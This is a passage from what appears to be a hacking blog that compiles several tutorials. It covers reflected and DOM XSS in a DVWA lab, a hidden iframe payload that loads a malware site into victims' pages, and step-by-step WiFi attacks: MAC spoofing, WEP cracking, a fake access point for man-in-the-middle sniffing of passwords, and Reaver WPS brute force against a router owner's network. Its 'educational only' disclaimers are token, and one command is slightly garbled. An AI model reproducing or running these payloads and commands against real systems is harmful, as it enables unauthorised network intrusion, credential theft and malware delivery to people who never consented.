Learn Cross Site Scripting Vulnerability & Exploit (XSS)

Hello, Guys here after short break m back with my Cool Post on XSS (Cross Site Scripting), today m gonna explain you : How Cross Site Scripting works, How to Prevent it and Understanding XSS Vulnerability & Exploits. Basically many of you'd not understood XSS Exploits Properly, So lets create, Explore, learn and Exploit.

Cross Site Scripting (XSS)

          Well, you might have heard a lots about XSS is one of the most easy and Common Web Application Vulnerability that allows an attacker to Inject his own script into Web pages and run into Server and that is really very dangerous. XSS can deface website, hack admin, Steal Session Cookies Modify Web Server and Web Pages etc.

* Simple Explaination of XSS :

             Suppose you create a Website using Some web programming languages like HTML, Javascript or PHP and you create one Input box in your web-page like Please Enter your Name : ,Okay ? & when any normal user will Enter his name like : Vivek then definitely your web-page will reflect that name to the user and says Hello, Vivek. Right ?? (Make sure that you've understand above example Properly, this also requires knowledge of HTML and Javascript Programming languages).

And What if ?  an attacker visits your web-page an he also Inject some Script of HTML Tag and Suppose your Web-page does n't have WAF Protection (WAF : Web Application Firewall : That prevents XSS & SQLi attack and filters your Strings into Characters.). then simply that script will execute webpage and an attacker will able to run his Own Script into Web Pages. So lets learn more about XSS.

Cross Site Scripting tutorial with Programming

                         Okay, guys let's explore Cross Site Scripting and learn advance and more deeper about cross Site Scripting. But you must know HTML, & little bit about Javascript, PHP and HTTP Architecture.

Part 1. Programming & Understanding Reflected XSS Vulnerability.

* So here m using Dawn Pentest Lab to show you tutorial with complete explaination with Programming and Vulnerability Exploits. Even I'll prefer you to use Dawn Pentest Lab to learn this tutorial.

* Start your DVWA Lab Click on XSS Reflected and keep Security Level on Low, for medium and High Exploits we'll increase it.

Click to Enlarge it

1. So, first of all there you can see that it has given us one box asking : What's your name ? well, if you'll enter your Name it will reflect back to you and Say : Hello, Vivek. Just do it and Also remember one thing in XSS always check URL to identify XSS.

Click to Enlarge it

2. Now Just Enter one HTML Tag like this : <Hunt> & Identify what it does ? now right click on webpage & Click on view Page Source, & search for Hunt if you'll see same text into Source Page <Hunt> that means the website is Vulnerable to XSS.

Click to Enlarge it

3. Now, you can see that web-page accepted that HTML tag that means we can Inject our own script into webpage and the web-page doesn't have WAF Protection. So, now let's use some Evil mind :D, use some scripts that can proof that this web-page is really vulnerable to XSS, Basically we always use Javascript <script>alert("XSS")</script>.

 

Click to Enlarge it

4. So you got a Pop-up that saying XSS, that means the website is vulnerable so can u understand ? why did it happens ? Okay..! Now just open Source code and Programming code of this Page Go to : C:\xampp\htdocs\dvwa\vulnerabilities\xss_r\source and Open that low.php file and try to understand it how it works.

Click to Enlarge it

5. Simply you can understand that how it works and it does not contain any types of Protection against XSS and HTML Injection that's the reason the website is vulnerable to XSS, Now let's try something Harder. Open DVWA and Change Security Level to Medium. And do the same thing Enter <Hunt> to check whether it is vulnerable or not ?

Click to Enlarge it

6. Now you can see this is also vulnerable, let's try the same script that we used to Pop-up XSS window in the low level security <script>alert("XSS")</script>. and Submit it.

Click to Enlarge it

7. Hey mate ? But you where sure ? that the website is vulnerable to XSS as it  accepted that HTML tag into webpage <Hunt> so why not it doesn't Pop-up XSS Box ?....! Okay now just once again click on Source Code

                                            Click to Enlarge it

8. Okay, now the website bypassed our HTML tag <script> & removed that from the source code that means the website is using some kind of Protection Against XSS, let's try something new :D Just Enter this Script and I'm sure you'll get XSS Pop-up : <Script>+alert('XSS')</script>.

 

Click to Enlarge it

9. Well, now you'll think what's the matter ? you know the website is using Bypassing techniques to bypass our Strings, now Just go to the same location

C:\xampp\htdocs\dvwa\vulnerabilities\xss_r\source and open medium.php file and Compare it with low.php try to understand how it bypassed your String and protected web-page from first Script Code. You'll see that it contains one more statement that black list your Command <script> and when someone will enter this command then website automatically bypass that string and keep website protected from script command this technique is often used in web-app to protect Web Pages against XSS.

Click to Enlarge it

10. So, that was the reason : The Web site bypassed our code so we used <Script> instead of <script> ..! we can also call it Blacklist. That is blocked by Web Application..!

11. So you might how can we protect our Web-page against XSS attacks ?

let's look into hard level we'll find the answer, Increase Security level to High and do the same thing using <Hunt> method, and View Page source.

Click to Enlarge it

12. Now look into Page Source : This is the biggest challenge for hackers to create and Pop-up XSS into Hard level, it's really very hard you can try as much as you can, This is called WAF : means the Web Application using HTML WAF that filters your Strings into Some HTML characters so no one will able to Inject command into Web Page and there would be no XSS Vulnerability. and Finally you'll see that the it bypass all our script and we're not able to Inject our command into Web Page Source, so explore the high.php file from that location and you'll see it is being protected by htmlspecialchars that bypass every strings, tags that is related to HTML Programming.

                                              Click to Enlarge it

So you might have understood little bit about XSS Vulnerability and Exploitation we'll learn more advance Techniques in Upcoming post so please stay tuned with us and Keep Sharing, and Increase us.

Feel free to comment and Ask your Problem and Please Share it :)

 

Read more...

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial

So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from here.

Before explaining about the DOM based xss, let me explain what DOM means to.

What is DOM?

DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.

 

<html> 
<head>
</head>
<body>
     <script>
var pos=document.URL.indexOf("BTSinput=")+9;  //finds the position of value 
var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
document.write(unescape(userInput)); //writes content to the webpage
  </script>
</body>
</html>

If you know HTML and Javscript, understanding the above code is a piece of cake.

In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage.

For example, if the url is

               www.BreakThesecurity.com/PenTesting?BTSinput=default

The webpage will display "default" as output.

Did you notice ?! The part of the webpage is not written by Server-side script.  The client side script modifies the content dynamically based on the input.   Everything done with the help of DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code. 

In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url. 

An attacker with malicious intention can inject a xss vector instead .  For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>

 

As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage.  So it will write the '<script>alert("BreakTheSec")</script>' in the webpage without sanitizing.  This results in running the script code and displays the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.

Read more...

New XSS Cheat Sheet - Bypassing Modern Web Application Firewall XSS Filters

 

 



While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.

There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won't work with the modern WAFs and latest browsers. 

So, here is need for creating new Cheat sheet.

One of the top security researcher Rafay Baloch has done an excellent job by organizing his own techniques to bypass modern WAFs and published a white paper on that.

The paper titled "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" covers only the techniques needed for bypassing XSS filters.

Rafay promised to write other vulnerabilities' bypassing techniques in his next paper.

You can download the WhitePaper from here.

 

This is purely for Educational purpose only. Don’t use it for illegal.if you do,  you will be in jail.

Read more...

Mass IFrame Attack Tutorial

Recently 90000 webpages infected by Iframe Injection attack.  Here i am going to explain what  IFrame Injection is.

 

What is an IFrame Injection?

Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website.  Malware  will be loaded to your computer, now you are infected

What is IFrame Tag?

<Iframe> tag stands for Inline Frame.  It is used to insert contents from another website or server.  That can be useful for building online applications.

 

IFrame Injection Attack:

Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one pixel square(You won't able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - leaving no obvious clue that it's malicious.

What an attacker can do with Iframe Injection?

Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:

1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:

<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Obfuscate javascript
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…

4. So if the clients load page, his system will be infected.

What you have to do ,if youinfected by Iframe Injection?

 

1. Change your passwords of ftp, control panel and database.


2. Inform to your hosting service about the injection attack and they will take care of server injection .


3. Download all your files from the hosting and  check whether they are infected or not. if you found any infected files, clean it.


4. Buy a good antivirus software, Scan your Computer completely.


5. Don't use the Public systems for logging into your Hosting service.

Webmasters  should take care(affects page rank,visitors) 

Webmaster, If you find your website is infected by Iframe Injection, then try to clean it as soon as possible before google detects it.  If the google detects it, it will show the Pop up message to your users " This site may harm your computer". Definitely , users won't come back to your site .  Also google will set black mark for your website.  You will lost your page rank and visitors.


If you want to check the what google thinks about your websites, then use this link:

http://www.google.com/safebrowsing/diagnostic?site=http://siteurl

 

This is purely for Educational purpose only. Don't use it for illegal.if you do,  you will be in jail.

 

Read more...

Cross Site Scripting(XSS) Complete Tutorial....

 

What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

t will be easy to understand XSS , if you have the following prerequisite:

• Strong Knowledge in HTML,javascript(Reference).


• Basic Knowledge in HTTP client-Server Architecure(Reference)


• [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.

Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).


• Bypassing restriction in websites.


• Session Hijacking(Stealing session)


• Malware Attack


• Website Defacement


• Denial of Service attacks(Dos)

 

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...

Bypassing MAC Filters on WiFi Networks

 

 

Most wireless routers have a security feature called MAC filtering. Each network card on a computer comes with a unique MAC address. MAC filtering allows the user to specify which computers are allowed to use the wireless network by entering the computer’s MAC address into the whitelist. This is a security tip that I see often when reading about securing wireless networks. When used by itself, or with WEP, it can give the user a false sense of security. I’m going to show you how this security layer can be bypassed.

For this hack, I’ve setup a test wireless network with a wireless router and three computers that are allowed to connect. A fourth computer, my laptop, will be used as the attacking computer. The wireless router’s SSID is ghost, it uses WEP for encryption, and employs MAC filtering. Here’s the attack plan:

1. Figure out what MAC addresses are on the whitelist so we know which computers are allowed to connect


2. Change our MAC address to one that’s on the whitelist


3. Crack the WEP key


4. Use the WEP key and our fake MAC address to login to the wireless network

So the first step is to figure out what MAC addresses are on the whitelist. This is relatively easy and just involves running airodump-ng. Here’s what it looks like when I point it at ghost:

Right away we see that there are three clients connected to ghost. More importantly, it displays their MAC addresses under the STATION column. Now we know which computers are on the whitelist.

Next, we need to trick the wireless router into allowing our computer to join the network. The way we do this is by changing our MAC address to one that’s on the whitelist. Let’s target 00:1D:4F:XX:XX:XX. The series of commands that will change our MAC address:

At this point we can start cracking the WEP key using a combination of airodump-ng, aireplay-ng, and aircrack-ng. There are also various automated tools to assist with this, such as the script I described in a previous post

Start by capturing all the packets:

For this example I’m using the ARP request replay attack. You may need to experiment with the different kinds of attacks until you get one that works properly:

Finally, crack the WEP key:

Assuming all of that went well, you should now have the WEP key required to authenticate to the wireless network.

Final step, authenticate to the wireless network. I’m using a USB based wireless adapter, so I just unplug it and plug it back in, then change the MAC address again to one that’s on the whitelist and use the network management program to authenticate and log into the wireless network. So we’ve seen how easy it is to bypass this security layer. That doesn’t mean you shouldn’t use it though, every extra hurdle the attacker has to go through puts them one step further from their goal. While it won’t stop a determined attacker, it will stop casual users and script kiddies. If you choose to use MAC filtering, pair it with WPA2 and use a good passphrase to keep out the bad guys.

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...

Wireless Eavesdropping using MITM

 

In the previous lab, we have learned how to create a setup for MITM. Now we will look at how to do Wireless Eavesdropping with this setup.

The whole lab revolves around the principle that all the victim's traffic is now routed through the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from the victim's machine over wireless.

Time for action – wireless eavesdropping

Follow these instructions to get started:

1. Replicate the entire setup as in the previous lab. Fire up Wireshark. It would be interesting to note that even the mitm-bridge shows up. This interface would allow us to peer into the bridge traffic, if we wanted to:
   

   

   
   


2. Start sniffing on the at0 interface, so that we can monitor all traffic sent and received by the wireless client:
   

   (Move the mouse over the image to enlarge it.)

   
   

   

   
   


3. On the wireless client, open up any web page. In my case, the wireless access point is also connected to LAN and I will open it up by using the address: http://192.168.0.1

1. Sign in with my password and enter the management interface.
   

   

   
   


2. In Wireshark, we should be seeing a lot of activity:
   

   (Move the mouse over the image to enlarge it.)

   
   

   

   
   

• 
  

  Set a filter for HTTP to see only the web traffic:

  
  

 

• We can easily locate the HTTP post request, which was used to send the password to the wireless access point:

 

• Next is a magnified look at the preceding packet:

 

• Expanding on the HTTP header, allows us to see that actually the password we entered in plaintext was not sent as is, but instead, a hash has been sent. If we look at packet no 64 in the preceding screenshot, we see that a request was made for /md5.js, which makes us suspect that it is a md5 hash of the password. It is interesting to note here that this technique may be prone to a replay attack, if a cryptographic salt is not used on a per session basis in the creation of the hash. We leave it as an exercise for the user to find out the details, as this is not part of wireless security and hence beyond the scope of this article.
  

  

  
  


• This shows how easy it is to monitor and eavesdrop on traffic sent by the client during a Man-In-The-Middle attack.

      What just happened?

 

The MITM setup we created is now allowing us to eavesdrop on the victim's wireless traffic without the victim knowing. This is possible because in an MITM all the traffic is relayed via the attacker machine. Thus all of the victim's unencrypted traffic is available for eavesdropping for the attacker.

 

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...

Advanced Wifi Attack:MITM

Man-in-the-Middle attack

 

MITM attacks are probably one of most potent attacks on a WLAN system. There are different configurations that can be used to conduct the attack. We will use the most common one—the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidently get connected to this fake access point and may continue to believe that he is connected to the legitimate access point.

The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces.

In the following lab exercise, we will simulate this attack.

 

Time for action – Man-in-the-Middle attack

 

Follow these instructions to get started:

1. To create the Man-in-the-Middle attack setup, we will first c create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command   airbase-ng --essid mitm –c 11 mon0:

 

It is important to note that airbase-ng when run, creates an interface at0 (tap interface). Think of this as the wired-side interface of our software-based access point mitm.

1. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless interface (at0). The succession of commands used for this are—brctl addbr mitm-bridge, brctl addif mitm-bridge eth0, brctl addif mitmbridge at0, ifconfig eth0 0.0.0.0 up, ifconfig at0 0.0.0.0 up:
   
   

   

   
   


2. We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we could do the same using DHCP as well. We can assign an IP address to the bridge interface with the command—ifconfig mitm-bridge 192.168.0.199 up. We can then try pinging the gateway192.168.0.1 to ensure we are connected to the rest of the network:
   
   

   

   
   


3. Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding can happen correctly using echo > 1 /proc/sys/net/ipv4/ip_forward:
   
   

   

   
   


4. Now let us connect a wireless client to our access point mitm. It would automatically get an IP address over DHCP (server running on the wired-side gateway). The client machine in this case receives the IP address 192.168.0.197. We can ping the wired side gateway 192.168.0.1 to verify connectivity:
   
   

   

   
   


5. We see that the host responds to the ping requests as seen:
   
   

   

   
   


6. We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine:
   
   

   

   
   


7. It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired-side, we have full control over the traffic. We can verify this by starting Wireshark and start sniffing on the at0 interface:
   

   

   
   


8. Let us now ping the gateway 192.168.0.1 from the client machine. We can now see the packets in Wireshark (apply a display filter for ICMP), even though the packets are not destined for us. This is the power of Man-in-the-Middle attacks!
   

   

   
   

What just happened?

We have successfully created the setup for a wireless Man-In-The-Middle attack. We did this by creating a fake access point and bridging it with our Ethernet interface. This ensured that any wireless client connecting to the fake access point would "perceive" that it is connected to the Internet via the wired LAN.

Have a go hero – Man-in-the-Middle over pure wireless

In the previous exercise, we bridged the wireless interface with a wired one. As we noted earlier, this is one of the possible connection architectures for an MITM. There are other combinations possible as well. An interesting one would be to have two wireless interfaces, one creates the fake access point and the other interface is connected to the authorized access point. Both these interfaces are bridged. So, when a wireless client connects to our fake access point, it gets connected to the authorized access point through the attacker machine.

Please note that this configuration would require the use of two wireless cards on the attacker laptop.

Check if you can conduct this attack using the in-built card on your laptop along with the external one. This should be a good challenge!

 How to Get data through MITM for this us must read this article Wireless Eavesdropping using MITM

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

 

Read more...

Wifi Wpa2 Cracking

Today i will tell you how to crack wpa2 wifi network with dictionary attach.

For cracking you need to require tools

Tools:

1)Vmware workstation

2)Backtrack 5 r3

3)Alpha wifi external usb AWUS036NH

4)A good Dictionary avaliable in crack station website

So lets Start watch this video and comment...

Wp2 Cracking By Pak Defendr from Anonymous Ghost on Vimeo.

 

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...

PA2-PSK Cracking

 

Reaver

What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:

airmon-ng

As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:

airmon-ng start wlan0

After that, type:

airodump-ng mon0 

 

Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:

wash -i mon0

If the target AP is vulnerable, it should say:

WPS Locked: No

 

Now, to start the attack, type:

reaver -i mon0 -b [BSSID] -vv

Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:

Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

AND

If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:

reaver --help

This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L

reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv

This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:

WPS PSK: 'PASSWORD HERE'

And here it is!

You should also, remember the PIN.

WPS PIN: PIN HERE

Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:

reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv

And it should give you the password in a matter of seconds!  

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

 

Read more...

Hack wireless work 100%

 

Today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!

I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.

Let's Begin.

Open up a terminal and type:

airmon-ng

This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:

airmon-ng start wlan1

Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:

airodump-ng mon0

When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.

Now, type:

airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

 

You should know start recieving DATA.

 

To speed up this proccess, open up another terminal and type:

aireplay-ng -1 0 -a [BSSID] mon0

After it says it was successfull, type:

aireplay-ng -3 -b [BSSID] mon0

After a some seconds this should appear:

 

 When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:

aircrack-ng wep-01.cap

Now, wait for some minutes and it should give you the PASSWORD! 

The password is:

EF855844B288E4BB1BA9ADF14D

 

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...